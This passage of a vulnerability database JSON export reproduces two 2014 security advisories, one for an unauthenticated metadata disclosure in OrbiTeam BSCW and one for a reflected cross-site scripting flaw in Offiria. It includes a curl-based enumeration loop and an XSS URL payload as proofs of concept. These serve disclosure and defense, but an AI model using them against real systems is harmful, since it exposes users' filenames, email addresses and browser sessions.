The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:DOC:30715", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30715", "title": "Cross-Site Scripting (XSS) in Offiria", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory: Metadata Information Disclosure in OrbiTeam BSCW\r\n\r\nRedTeam Pentesting discovered an information disclosure vulnerability in\r\nOrbiTeam's BSCW collaboration software. An unauthenticated attacker can\r\ndisclose metadata about internal objects which are stored in BSCW.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: BSCW\r\nAffected Versions: BSCW <=5.0.7\r\nFixed Versions: BSCW >=5.0.8\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: medium\r\nVendor URL: http://www.bscw.de/english/product.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003\r\nAdvisory Status: published\r\nCVE: CVE-2014-2301\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n"The BSCW shared workspace system is the tool of choice for efficient\r\ngroup collaboration. BSCW permits the creation of documents,\r\nappointments, contacts, tasks and notes within shared workspaces.\r\nWithout having to install additional software, team members can access\r\nthis data around-the-clock, from anywhere in the world. 
Mission-critical\r\ninformation is constantly available to all authorised personnel\r\nregardless of location, ensuring that complex workflows can be\r\ncoordinated with minimal effort."\r\n\r\n(from OrbiTeam's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nBSCW uses the URL parameter "op" to select different functions of the\r\napplication. For example the password reset dialog can be used by\r\nopening the following URL:\r\n\r\nhttps://www.example.com/pub/bscw.cgi/?op=chpwd\r\n\r\nThe server maps the value provided by the parameter "op" to locally\r\nstored python modules which provide handler functions that are called to\r\ngenerate HTTP responses. It was discovered that sensitive metadata about\r\ninternally stored objects of BSCW can be disclosed by using the "inf"\r\noperation.\r\n\r\nWhen opening the following URL, the filename of a document which\r\nis identified by the value "12345" is disclosed in the response\r\nsent by the server (output shortened):\r\n\r\n$ curl --header 'Cookie: _pub_bscws="e4efb9e7ace7a12de82aa7a4aff1ab2a:1"' \\r\n "http://www.example.com/pub/bscw.cgi/12345?op=inf"\r\n[...]\r\n<table summary="" class="iTab" border="0" cellspacing="1" cellpadding="4" width="440">\r\n <tr valign="top">\r\n <td class="iLabel" id="small" width="88">Name</td>\r\n <td class="iValueB" width="352">Contract-XXXXX.doc</td>\r\n </tr>\r\n</table>\r\n[...]\r\n\r\nThe cookie used in the above command is generated by requesting the\r\nlogin page of BSCW. It is not necessary to enter credentials.\r\n\r\nBy iterating over the ids which are assigned in ascending order,\r\nattackers can enumerate the names of all objects stored in BSCW without\r\nprior authentication. 
This includes filenames and email addresses.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nWhen the following loop is run with a valid (but unauthenticated) BSCW\r\ncookie, it will find names for the BSCW objects 10000 to 30000:\r\n\r\n$ for id in `seq 10000 30000`; do\r\n filename = `curl --silent --header 'Cookie: _pub_bscws="COOKIE_COOKIE_COOKIE"' \\r\n "http://www.example.com/pub/bscw.cgi/${id}?op=inf" | \\r\n grep "iValueB" | \\r\n sed -e 's;^.*<td class="iValueB" width="352">\(.*\)</td>.*$;\1;'`\r\n echo "${id}: $(unknown)"\r\ndone\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nIt may be possible to add another authentication layer, for example\r\nHTTP-Authentication, to limit access to this BSCW information disclosure\r\nto persons authorized to use BSCW anyway.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to version 5.0.8.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe risk is estimated to be medium. This vulnerability does not allow\r\nattackers to access files stored in BSCW. They can however retrieve\r\nfilenames, which may be enough to draw conclusions about the\r\ncorresponding file contents, and other potentially sensitive data such\r\nas email addresses.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-02-20 Vulnerability identified\r\n2014-03-04 Customer approved disclosure to vendor\r\n2014-03-06 CVE number requested and assigned\r\n2014-03-07 Vendor notified\r\n2014-03-10 Vendor acknowledges vulnerability\r\n2014-04-22 Vendor released fixed version\r\n2014-05-08 Advisory released\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. 
Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Gesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen\r\n\r\n", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:DOC:30713", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30713", "title": "[RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:VULN:13764", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13764", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:10", "bulletinFamily": "exploit", "description": "", "modified": "2014-05-08T00:00:00", "published": "2014-05-08T00:00:00", "href": "https://packetstormsecurity.com/files/126551/OrbiTeam-BSCW-5.0.7-Metadata-Information-Disclosure.html", "id": "PACKETSTORM:126551", "type": "packetstorm", "title": "OrbiTeam BSCW 
5.0.7 Metadata Information Disclosure", "sourceData": "`Advisory: Metadata Information Disclosure in OrbiTeam BSCW \n \nRedTeam Pentesting discovered an information disclosure vulnerability in \nOrbiTeam's BSCW collaboration software. An unauthenticated attacker can \ndisclose metadata about internal objects which are stored in BSCW. \n \n \nDetails \n======= \n \nProduct: BSCW \nAffected Versions: BSCW <=5.0.7 \nFixed Versions: BSCW >=5.0.8 \nVulnerability Type: Information Disclosure \nSecurity Risk: medium \nVendor URL: http://www.bscw.de/english/product.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003 \nAdvisory Status: published \nCVE: CVE-2014-2301 \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301 \n \n \nIntroduction \n============ \n \n\"The BSCW shared workspace system is the tool of choice for efficient \ngroup collaboration. BSCW permits the creation of documents, \nappointments, contacts, tasks and notes within shared workspaces. \nWithout having to install additional software, team members can access \nthis data around-the-clock, from anywhere in the world. Mission-critical \ninformation is constantly available to all authorised personnel \nregardless of location, ensuring that complex workflows can be \ncoordinated with minimal effort.\" \n \n(from OrbiTeam's homepage) \n \n \nMore Details \n============ \n \nBSCW uses the URL parameter \"op\" to select different functions of the \napplication. For example the password reset dialog can be used by \nopening the following URL: \n \nhttps://www.example.com/pub/bscw.cgi/?op=chpwd \n \nThe server maps the value provided by the parameter \"op\" to locally \nstored python modules which provide handler functions that are called to \ngenerate HTTP responses. It was discovered that sensitive metadata about \ninternally stored objects of BSCW can be disclosed by using the \"inf\" \noperation. 
\n \nWhen opening the following URL, the filename of a document which \nis identified by the value \"12345\" is disclosed in the response \nsent by the server (output shortened): \n \n$ curl --header 'Cookie: _pub_bscws=\"e4efb9e7ace7a12de82aa7a4aff1ab2a:1\"' \\ \n\"http://www.example.com/pub/bscw.cgi/12345?op=inf\" \n[...] \n<table summary=\"\" class=\"iTab\" border=\"0\" cellspacing=\"1\" cellpadding=\"4\" width=\"440\"> \n<tr valign=\"top\"> \n<td class=\"iLabel\" id=\"small\" width=\"88\">Name</td> \n<td class=\"iValueB\" width=\"352\">Contract-XXXXX.doc</td> \n</tr> \n</table> \n[...] \n \nThe cookie used in the above command is generated by requesting the \nlogin page of BSCW. It is not necessary to enter credentials. \n \nBy iterating over the ids which are assigned in ascending order, \nattackers can enumerate the names of all objects stored in BSCW without \nprior authentication. This includes filenames and email addresses. \n \n \nProof of Concept \n================ \n \nWhen the following loop is run with a valid (but unauthenticated) BSCW \ncookie, it will find names for the BSCW objects 10000 to 30000: \n \n$ for id in `seq 10000 30000`; do \nfilename = `curl --silent --header 'Cookie: _pub_bscws=\"COOKIE_COOKIE_COOKIE\"' \\ \n\"http://www.example.com/pub/bscw.cgi/${id}?op=inf\" | \\ \ngrep \"iValueB\" | \\ \nsed -e 's;^.*<td class=\"iValueB\" width=\"352\">\\(.*\\)</td>.*$;\\1;'` \necho \"${id}: $(unknown)\" \ndone \n \n \nWorkaround \n========== \n \nIt may be possible to add another authentication layer, for example \nHTTP-Authentication, to limit access to this BSCW information disclosure \nto persons authorized to use BSCW anyway. \n \n \nFix \n=== \n \nUpdate to version 5.0.8. \n \n \nSecurity Risk \n============= \n \nThe risk is estimated to be medium. This vulnerability does not allow \nattackers to access files stored in BSCW. 
They can however retrieve \nfilenames, which may be enough to draw conclusions about the \ncorresponding file contents, and other potentially sensitive data such \nas email addresses. \n \n \nTimeline \n======== \n \n2014-02-20 Vulnerability identified \n2014-03-04 Customer approved disclosure to vendor \n2014-03-06 CVE number requested and assigned \n2014-03-07 Vendor notified \n2014-03-10 Vendor acknowledges vulnerability \n2014-04-22 Vendor released fixed version \n2014-05-08 Advisory released \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 
25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126551/rt-sa-2014-003.txt"}, {"lastseen": "2016-12-05T22:14:30", "bulletinFamily": "exploit", "description": "", "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "href": "https://packetstormsecurity.com/files/126530/Offiria-2.1.0-Cross-Site-Scripting.html", "id": "PACKETSTORM:126530", "type": "packetstorm", "title": "Offiria 2.1.0 Cross Site Scripting", "sourceData": "`Advisory ID: HTB23210 \nProduct: Offiria \nVendor: Slashes & Dots Sdn Bhd. \nVulnerable Version(s): 2.1.0 and probably prior \nTested Version: 2.1.0 \nAdvisory Publication: April 2, 2014 [without technical details] \nVendor Notification: April 2, 2014 \nPublic Disclosure: May 7, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2689 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689 \n \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after \"/installer/index.php\" script that is not removed from the system by default. 
A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \n \nThe following exploitation example displays \"immuniweb\" word: \n \nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to: \n- 6 notifications by email \n- 1 notification via twitter \n- 1 notification via GitHub \n \nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in Offiria. \n[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization. \n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[4] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126530/offiria-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}